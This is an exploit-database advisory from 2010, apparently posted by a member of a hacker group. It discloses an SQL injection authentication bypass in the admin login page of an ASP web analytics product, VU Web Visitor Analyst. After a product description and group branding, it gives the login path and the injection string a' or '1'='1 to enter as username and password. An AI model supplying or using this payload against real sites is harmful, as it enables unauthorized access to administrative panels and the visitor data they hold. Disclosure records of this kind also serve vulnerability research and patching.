VU Web Visitor Analyst – Authentication Bypass

  • 作者: L0rd CrusAd3r
    日期: 2010-06-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13842/
  • 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0 _ __ __ __ 1
    1 /' \__/'__`\/\ \__/'__`\ 0
    0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
    1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
    0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
    1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
    0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
    1\ \____/ >> Exploit database separated by exploit 0
    0 \/___/type (local, remote, DoS, etc.)1
    11
    0[+] Site: Inj3ct0r.com0
    1[+] Support e-mail: submit[at]inj3ct0r.com1
    00
    1########################################### 1
    0I'm L0rd CrusAd3r member from Inj3ct0r Team 1
    1########################################### 0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:VU Web Visitor Analyst Authentication Bypass
    Code: ASP 3.0 & VBScript
    Vendor url:http://www.vunet.us
    Version:n/a
    Price:80$
    Published: 2010-06-12
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to
    all ICW members.
    Spl Greetz to:inj3ct0r.com Team
    
    #####################################################################################################################################################################################################
    
    Description:
    
    VU Web Visitor Analyst is an application that retrieves your website
    visitors’ IP address, visited date and time, visited page name, the link a
    visitor came from originally (referred URL address). You can view the single
    visitor history with the list of all pages visited. You can also display
    visits by date criteria. The weekly statistics allow you to see the total
    visits for every single day in the present and last weeks. The monthly
    statistics allow you viewing the total visits of every month for the whole
    year. In addition, every visitor is linked to the web database containing
    personal information about this visitor’s IP address (such as name, address,
    phone, email, etc. if available).
    Pleasant and professional graphic user interface will make your statistical
    experience more enjoyable.
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *Authentication Bypass found
    
    The Provided Script as Sqli Vulnerability in Admin Login page
    
    
    DEMO URL:
    
    http://[site]/demo/webanalyst/default.asp
    
    Use the string a' or '1'='1 for Username and Password to gain access.
    
    
    # 0day n0 m0re #
    # L0rd CrusAd3r #
    
    -- 
    With R3gards,
    L0rd CrusAd3r